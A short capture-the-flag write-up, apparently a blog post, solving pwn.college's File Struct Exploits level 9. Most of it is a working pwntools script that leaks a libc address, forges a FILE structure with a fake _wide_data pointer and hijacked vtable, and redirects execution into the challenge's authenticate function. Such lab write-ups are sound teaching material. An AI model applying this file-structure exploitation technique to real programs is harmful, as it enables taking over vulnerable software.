Post

(File Struct Exploits) level 9

Posted
By hackeringtrue
1 min read
(File Struct Exploits) level 9

Information

  • category: pwn

Description

Create a fake _wide_data struct to hijack control of the virtual function table of a built-in FILE struct.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

from pwn import *

elf = context.binary = ELF("/challenge/babyfile_level9")
global p
p = elf.process()

def exploit():
    p.recvuntil(b"libc is: ")
    puts = int(p.recvline()[:-1],16) - 0x84420

    _IO_wfile_overflow = puts + 0x1E8DC0
    fp_addrr = puts + 0x1ed6a0

    fp = FileStructure()
    fp._lock = fp_addrr
    fp.chain = elf.sym['authenticate'] + 37
    fp._wide_data = fp_addrr
    fp.vtable = _IO_wfile_overflow

    p.send(bytes(fp) + p64(fp_addrr))

    p.interactive()

def main():
    exploit()

if __name__ == "__main__":
    main()
pwn.college, File-Struct-Exploits
pwn.college FSOP vtable overlaping-vtable
This post is licensed under CC BY 4.0 by the author.